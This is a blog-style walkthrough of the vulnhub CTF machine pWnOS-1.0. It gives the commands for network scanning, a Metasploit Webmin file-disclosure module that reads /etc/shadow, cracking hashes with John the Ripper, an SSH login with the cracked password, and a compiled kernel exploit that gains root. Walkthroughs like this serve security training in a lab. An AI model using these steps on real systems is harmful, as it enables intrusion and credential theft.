Hack the pWnOS-1.0 (Boot To Root)

https://www.youtube.com/watch?v=Bw7tw5ZfvLA

Hey folks, Ashish this side. Today we are going to solve another CTF challenge “pWnOS-1.0” of the vulnhub labs. The level of this challenge is not so tough and its difficulty level is described as beginner/intermediate. You can download it from here https://www.vulnhub.com/entry/pwnos-10,33/

Our goal is to gain root access to the machine.

*Vulnerabilities:

1. Arbitrary File Disclosure: Basically, the arbitrary file is a file that allows you to modify everything on a system.
2. Privilege Escalation: Privilege escalation is the act of exploiting a bug, in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
3. Weak Credentials: (weak password) is something that could be rapidly guessed by executing a brute force attack using a subset of all possible passwords.

*Penetration Methodologies:

1. Network Scanning (Nmap)
2. Exploiting web application (Metasploit)
3. Extracting arbitrary file
4. Cracking password hashes (John the ripper)
5. Spawning TTY shell (via SSH login)
6. Kernel Privilege Escalation

Let’s get started!

We will perform a local scan to discover machines on our local network

arp-scan -l 

The ip of the target machine = 192.168.95.130

Let’s enumerate the open ports to discover services, so we run nmap on the target machine

nmap -A 192.168.95.130

From the result, we can see that the machine has port 22 (ssh), port 80 (http), and port 10000 (Webmin) open.

Now, we will check in Metasploit for the available Webmin exploit.

An exploit is found. We will use it to get it /etc/passwd/ and /etc/shadow/ files from target machine.

use auxiliary/admin/webmin/file_disclosure 
msf auxiliary(file_disclosure) > set rhost 192.168.95.130
msf auxiliary(file_disclosure) > exploit

As you can observe we have fetched the available username of the victim’s system.

msf auxiliary(file_disclosure) > set rpath /etc/shadow 
msf auxiliary(file_disclosure) > exploit

As you can observe we have also fetched a shadow file of the victim’s system which holds password hashes.

Now, we will merge passwd.txt and shadow.txt into a format that JohnTheRipper can understand.

Let’s crack the password hash present in the hash.txt file using John.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

The password for vmware user has been cracked. we will use it to ssh into the machine.

ssh -oHostKeyAlgorithms=+ssh-dss vmware@192.168.95.130
password - h4ckm3

Now we are in the machine and will perform privilege escalation to gain root access.

The following exploit will be used to gain root access

https://www.exploit-db.com/exploits/5092

Download the exploit and send it over to the target machine.

Compiling the code and running

gcc 5092.c -o exploit
./exploit

Booommm! Here we have Root access.

If you got root and this blog was helpful consider following me and a clap would really motivate me to write more such blogs.

Now you know what to do, try it yourself and let me know whether you pwned the system or not.

Keep Coming for more.

Happy Hacking!!!